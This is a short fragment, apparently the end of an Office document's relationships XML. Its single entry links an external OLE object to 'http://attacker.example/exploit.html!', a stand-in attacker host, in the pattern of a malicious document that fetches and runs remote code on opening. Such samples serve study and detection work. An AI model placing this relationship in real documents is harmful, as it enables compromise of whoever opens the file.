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oleObject" Target="http://attacker.example/exploit.html!" TargetMode="External"/></Relationships>
</file>